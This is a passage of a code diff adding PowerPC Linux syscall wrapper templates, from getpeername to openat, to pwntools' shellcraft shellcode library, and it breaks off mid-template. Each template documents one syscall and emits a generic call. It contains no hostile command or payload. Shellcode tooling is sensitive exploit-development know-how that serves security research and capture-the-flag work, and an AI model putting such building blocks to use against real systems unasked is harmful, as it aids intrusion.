b/pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm new file mode 100644 index 000000000..8970db91d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm new file mode 100644 index 000000000..0a484fde6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm new file mode 100644 index 000000000..d8dbe268a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpid.asm new file mode 100644 index 000000000..7980500eb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm new file mode 100644 index 000000000..8fdbd8e87 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getppid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getppid.asm new file mode 100644 index 000000000..4d6809d68 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm new file mode 100644 index 000000000..ee7f0e2e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm new file mode 100644 index 000000000..b9cb53e4c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm new file mode 100644 index 000000000..e89aa4a9d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm b/pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm new file mode 100644 index 000000000..e7b88a94c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm b/pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm new file mode 100644 index 000000000..dc0035b6d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getsid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getsid.asm new file mode 100644 index 000000000..57b7a6424 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm b/pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm new file mode 100644 index 000000000..d1a36cdeb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm b/pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm new file mode 100644 index 000000000..873c38457 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm new file mode 100644 index 000000000..408444283 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getuid.asm new file mode 100644 index 000000000..dc117fa4d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/gtty.asm b/pwnlib/shellcraft/templates/powerpc/linux/gtty.asm new file mode 100644 index 000000000..163de1670 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm b/pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm new file mode 100644 index 000000000..63e50fc56 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm b/pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm new file mode 100644 index 000000000..f6f896b45 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/iopl.asm b/pwnlib/shellcraft/templates/powerpc/linux/iopl.asm new file mode 100644 index 000000000..57ad3e3fd --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/kill.asm b/pwnlib/shellcraft/templates/powerpc/linux/kill.asm new file mode 100644 index 000000000..6cb3eb6c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/kill.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, sig"/> +<%docstring> +Invokes the syscall kill. See 'man 2 kill' for more information. + +Arguments: + pid(pid_t): pid + sig(int): sig + + + ${syscall('SYS_kill', pid, sig)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lchown.asm b/pwnlib/shellcraft/templates/powerpc/linux/lchown.asm new file mode 100644 index 000000000..2530f8fbc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/lchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall lchown. See 'man 2 lchown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_lchown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/link.asm b/pwnlib/shellcraft/templates/powerpc/linux/link.asm new file mode 100644 index 000000000..078e39b88 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/link.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/linkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/linkat.asm new file mode 100644 index 000000000..afcbd1339 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/listen.asm b/pwnlib/shellcraft/templates/powerpc/linux/listen.asm new file mode 100644 index 000000000..f9e5a7c2a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/listen.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, n"/> +<%docstring> +Invokes the syscall listen. See 'man 2 listen' for more information. + +Arguments: + fd(int): fd + n(int): n + + + ${syscall('SYS_listen', fd, n)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lseek.asm b/pwnlib/shellcraft/templates/powerpc/linux/lseek.asm new file mode 100644 index 000000000..39fa24ec1 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/lseek.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, offset, whence"/> +<%docstring> +Invokes the syscall lseek. See 'man 2 lseek' for more information. + +Arguments: + fd(int): fd + offset(off_t): offset + whence(int): whence + + + ${syscall('SYS_lseek', fd, offset, whence)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lstat.asm b/pwnlib/shellcraft/templates/powerpc/linux/lstat.asm new file mode 100644 index 000000000..c26ae0117 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/lstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat. See 'man 2 lstat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_lstat', file, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm new file mode 100644 index 000000000..303715850 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall lstat64. See 'man 2 lstat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_lstat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/madvise.asm b/pwnlib/shellcraft/templates/powerpc/linux/madvise.asm new file mode 100644 index 000000000..e2c61685b --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/madvise.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, len, advice"/> +<%docstring> +Invokes the syscall madvise. See 'man 2 madvise' for more information. + +Arguments: + addr(void): addr + len(size_t): len + advice(int): advice + + + ${syscall('SYS_madvise', addr, len, advice)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mincore.asm b/pwnlib/shellcraft/templates/powerpc/linux/mincore.asm new file mode 100644 index 000000000..4f064f2cd --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mincore.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="start, len, vec"/> +<%docstring> +Invokes the syscall mincore. See 'man 2 mincore' for more information. + +Arguments: + start(void): start + len(size_t): len + vec(unsigned): vec + + + ${syscall('SYS_mincore', start, len, vec)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm new file mode 100644 index 000000000..2ff853fde --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path, mode"/> +<%docstring> +Invokes the syscall mkdir. See 'man 2 mkdir' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdir', path, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm b/pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm new file mode 100644 index 000000000..3e9049cbc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mknod.asm b/pwnlib/shellcraft/templates/powerpc/linux/mknod.asm new file mode 100644 index 000000000..f3d472894 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm b/pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm new file mode 100644 index 000000000..18dcffb34 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mlock.asm b/pwnlib/shellcraft/templates/powerpc/linux/mlock.asm new file mode 100644 index 000000000..9a4844f8f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm b/pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm new file mode 100644 index 000000000..691d61268 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mmap.asm b/pwnlib/shellcraft/templates/powerpc/linux/mmap.asm new file mode 100644 index 000000000..6a8841264 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mmap.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm b/pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm new file mode 100644 index 000000000..eb344aced --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm new file mode 100644 index 000000000..9bb6a498e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm new file mode 100644 index 000000000..d387901a2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm new file mode 100644 index 000000000..901222ca1 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm new file mode 100644 index 000000000..8e88ed71f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm new file mode 100644 index 000000000..d9fe35a68 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mremap.asm b/pwnlib/shellcraft/templates/powerpc/linux/mremap.asm new file mode 100644 index 000000000..9b4fcf0e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/msync.asm b/pwnlib/shellcraft/templates/powerpc/linux/msync.asm new file mode 100644 index 000000000..e36fd1f9b --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/munlock.asm b/pwnlib/shellcraft/templates/powerpc/linux/munlock.asm new file mode 100644 index 000000000..37136c4a6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm b/pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm new file mode 100644 index 000000000..b6893e165 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/munmap.asm b/pwnlib/shellcraft/templates/powerpc/linux/munmap.asm new file mode 100644 index 000000000..9ced6f7b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm b/pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm new file mode 100644 index 000000000..760581d37 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/nice.asm b/pwnlib/shellcraft/templates/powerpc/linux/nice.asm new file mode 100644 index 000000000..28312b357 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/open.asm b/pwnlib/shellcraft/templates/powerpc/linux/open.asm new file mode 100644 index 000000000..c88a4b326 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/openat.asm b/pwnlib/shellcraft/templates/powerpc/linux/openat.asm new file mode 100644 index 000000000..bec5b74f2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, 